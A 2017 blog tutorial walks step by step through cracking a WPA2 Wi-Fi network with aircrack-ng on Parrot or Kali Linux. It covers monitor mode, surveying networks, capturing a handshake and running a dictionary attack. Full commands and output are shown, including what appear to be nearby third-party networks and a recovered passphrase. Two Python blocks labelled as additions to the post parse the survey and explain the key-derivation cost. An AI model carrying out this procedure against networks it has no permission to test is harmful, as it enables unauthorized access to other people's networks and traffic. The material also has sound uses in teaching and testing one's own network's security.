How to crack a wireless WPA2 network with aircrack on Parrot or Kali Linux.

Posted: July 26, 2017. At: 12:09 PM. Post ID: 10984

To start a wireless interface in monitor mode, use this command. It creates a new monitor-mode interface that the following steps use to attempt to crack a wireless network.

┌─[root@parrot][/home/user]
└──╼ #airmon-ng start wlan1
 
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
 1142 NetworkManager
 1253 wpa_supplicant
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy2	wlan1		rtl8187		Realtek Semiconductor Corp. RTL8187
 
		(mac80211 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
		(mac80211 station mode vif disabled for [phy2]wlan1)

Now get a listing of all wireless networks and MAC addresses using the new monitor interface.

┌─[root@parrot][/home/user]
└──╼ #airodump-ng wlan1mon

This is the output you should get: a listing of all wireless networks and MAC addresses, followed by the stations seen talking to them.

 CH  7 ][ Elapsed: 24 s ][ 2017-07-26 01:40                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                        
 E0:B9:E5:B8:31:BB  -30       29       17    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                       
 FA:AB:05:96:21:1A  -61        4        0    0   1  54e  OPN              Telstra Air                                                         
 FA:AB:05:96:21:1B  -62        4        1    0   1  54e  OPN              Fon WiFi                                                            
 F8:AB:05:96:20:19  -62        9        0    0   1  54e  WPA2 CCMP   PSK  Telstra962013                                                       
 E0:B9:E5:6E:D3:69  -59       36       49    2   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                       
 C4:EA:1D:6A:65:D7  -64       14        0    0   1  54e  WPA2 CCMP   PSK  Telstra6A65D7                                                       
 FA:AB:05:CF:98:E2  -64        9        0    0   6  54e  OPN              Telstra Air                                                          
 F8:AB:05:CF:97:E1  -65        9        0    0   6  54e  WPA2 CCMP   PSK  TelstraCF97DB                                                        
 FA:AB:05:CF:98:E3  -65       12        0    0   6  54e  OPN              Fon WiFi                                                             
 C6:EA:1D:6C:4D:34  -66        2        0    0   6  54e. OPN              Fon WiFi                                                             
 C4:EA:1D:6C:4D:31  -68        2        0    0   6  54e  WPA2 CCMP   PSK  Telstra6C4D31                                                        
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                     
 
 00:25:00:FF:94:73  EE:3F:54:D9:F1:03  -16    0 -12    101       37                                                                            
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -36    0 - 1      0        1                                                                            
 FA:AB:05:96:21:1B  C4:42:02:8F:BC:58  -69    0 - 1e     0        5
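As an added example (not part of the original post), here is a small Python parser for the airodump-ng screen listing above that a network owner can use to triage a survey of their own environment: it splits the irregular ENC/CIPHER/AUTH/ESSID tail correctly and flags open, PSK and legacy networks. The row layout is assumed from the listing shown here; airodump-ng's --write option also produces a CSV file, which is easier to parse than screen output.

```python
import re

# Matches one access-point row of the airodump-ng listing above: BSSID PWR
# Beacons #Data #/s CH MB, then an irregular tail (ENC CIPHER AUTH ESSID):
# OPN rows have no CIPHER/AUTH, hidden APs show "<length: N>" with no ENC,
# and ESSIDs may contain spaces, so the tail is split by hand below.
AP_ROW = re.compile(
    r"^\s*([0-9A-F]{2}(?::[0-9A-F]{2}){5})\s+(-?\d+)\s+\d+\s+\d+\s+\d+"
    r"\s+(-?\d+)\s+\S+\s+(.*?)\s*$")

def parse_ap_rows(screen: str) -> list[dict]:
    """Parse the AP section of airodump-ng screen output; stop at the STATION table."""
    aps = []
    for line in screen.splitlines():
        if "STATION" in line:
            break
        m = AP_ROW.match(line)
        if not m:
            continue                   # header, status and blank lines
        bssid, pwr, ch, rest = m.groups()
        if not rest or rest.startswith("<"):
            enc = cipher = auth = ""   # hidden network, ESSID shown as <length: N>
            essid = rest
        else:
            enc, _, tail = rest.partition(" ")
            if enc == "OPN":
                cipher = auth = ""     # open network, CIPHER/AUTH columns blank
                essid = tail.strip()
            else:
                cipher, auth, essid = (tail.split(None, 2) + ["", "", ""])[:3]
        aps.append({"bssid": bssid, "power": int(pwr), "channel": int(ch),
                    "enc": enc, "cipher": cipher, "auth": auth, "essid": essid})
    return aps

def triage(aps: list[dict]) -> dict[str, list[str]]:
    """Open networks, WPA-Personal networks (the ones a captured handshake can be
    guessed against offline) and legacy WEP/TKIP networks that should be retired."""
    return {
        "open": [a["essid"] for a in aps if a["enc"] == "OPN"],
        "psk": [a["essid"] for a in aps if a["auth"] == "PSK"],
        "legacy": [a["essid"] for a in aps if a["enc"] in ("WEP", "WPA") or a["cipher"] == "TKIP"],
    }

# Constructed sample: rows copied from the listing above plus one station row,
# which must not be mistaken for an access point.
SAMPLE = """\
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>
 E0:B9:E5:B8:31:BB  -30       29       17    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA
 FA:AB:05:96:21:1A  -61        4        0    0   1  54e  OPN              Telstra Air
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -36    0 - 1      0        1
"""
```

Run `triage(parse_ap_rows(SAMPLE))` to get the three lists; on the full listing above every non-open network is WPA2/CCMP/PSK, which is exactly the configuration the rest of this post attacks.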

Now we focus on one wireless network, locked to its channel, to capture a handshake, which is the exchange that takes place when a client connects to the network.

┌─[root@parrot]─[/home/user]
└──╼ #airodump-ng --bssid E0:B9:E5:B8:31:BB -c 11 --write password wlan1mon

And I was successful: the "WPA handshake" text in the status line tells me that I have captured a 3-way handshake.

CH 11 ][ Elapsed: 2 mins ][ 2017-07-26 01:48 ][ WPA handshake: E0:B9:E5:B8:31:BB                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:B8:31:BB  -21 100     1685      466    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                   
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                    
 
 E0:B9:E5:B8:31:BB  8C:79:67:9A:44:4A  -30    1e- 1      0       54                                                                            
 E0:B9:E5:B8:31:BB  F0:25:B7:FA:01:4A  -32    1e- 1e     0       22

Now it is time to crack the cap file. Use a very large wordlist file if you are not sure what the password is. This will not work unless the password is in the wordlist.

┌─[root@parrot][/home/user]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

And I was successful. The WPA2 Pre-Shared Key was cracked easily. This is easier when there are many users on the network constantly connecting, since that makes capturing a handshake easier.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:00] 24/7120716 keys tested (870.89 k/s) 
 
      Time left: 2 hours, 16 minutes, 24 seconds                 0.00%
 
                        KEY FOUND! [ debian589547FFG ]
 
 
      Master Key     : 81 B4 24 04 9A 4B 3B D3 15 D6 D6 46 92 3C 9E 1B 
                       24 3E 47 47 F7 74 B6 F2 40 E8 A3 26 ED 36 79 CF 
 
      Transient Key  : 41 87 8E 9A 9B 95 83 7A 15 B6 6C 31 9B DA 64 34 
                       57 BD 01 19 7C E5 6D 25 C0 61 00 1E 50 51 9D 6A 
                       AB 7F 30 A9 FE D7 42 32 CB E9 D5 08 5A D8 FE FC 
                       D5 2A 28 77 C2 9A 2F 97 70 D0 87 44 A7 60 0E 49 
 
      EAPOL HMAC     : 4F 40 BA D7 D7 02 87 57 B8 AA 63 02 7D B7 F4 72
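To make sense of the "Master Key" line and the "keys tested" rate in that output, here is an added Python example (not from the original post) that reproduces the WPA2-PSK key derivation defined in IEEE 802.11i and checks it against the standard's Annex H.4 known-answer vector. The wordlist size and rate used for the time estimate are the figures shown above; the function names are my own.

```python
import hashlib

# Parameters fixed by IEEE 802.11i for WPA/WPA2-Personal key derivation.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32          # 256-bit Pairwise Master Key

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32).

    This is the value aircrack-ng prints as "Master Key". The ESSID is the
    salt, so the same passphrase yields a different PMK on a differently
    named network, and precomputed tables only help for one ESSID at a time."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)

def format_master_key(pmk: bytes) -> list[str]:
    """Lay the PMK out as aircrack-ng does: two rows of 16 upper-case hex bytes."""
    pairs = [f"{b:02X}" for b in pmk]
    return [" ".join(pairs[i:i + 16]) for i in range(0, len(pairs), 16)]

def hmac_calls_per_guess() -> int:
    """Work factor per candidate passphrase: a 32-byte PMK needs two 20-byte
    PBKDF2 blocks of 4096 HMAC-SHA1 iterations each. This, not the capture,
    is what bounds the "keys tested" rate in the aircrack-ng output above."""
    return -(-PMK_LEN // 20) * PBKDF2_ITERATIONS

def seconds_to_exhaust(wordlist_size: int, keys_per_second: float) -> float:
    """Time a dictionary run needs when the passphrase is NOT in the list.
    Note that aircrack-ng's "k/s" means keys per second, not thousands."""
    return wordlist_size / keys_per_second

if __name__ == "__main__":
    # Known-answer test from IEEE 802.11i-2004 Annex H.4: passphrase "password", SSID "IEEE".
    for row in format_master_key(derive_pmk("password", "IEEE")):
        print(row)
    # Figures from the aircrack-ng run above: 7,120,716 candidates at 870.89 keys/s.
    hours = seconds_to_exhaust(7_120_716, 870.89) / 3600
    print(f"{hmac_calls_per_guess()} HMAC-SHA1 calls per guess; "
          f"about {hours:.2f} h to finish rockyou.txt if the passphrase is not in it")
```

The practical consequence for a network owner is that a passphrase absent from every public wordlist costs an attacker the full PBKDF2 work factor per guess, so length and randomness of the PSK are the only defence once a handshake has been captured.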
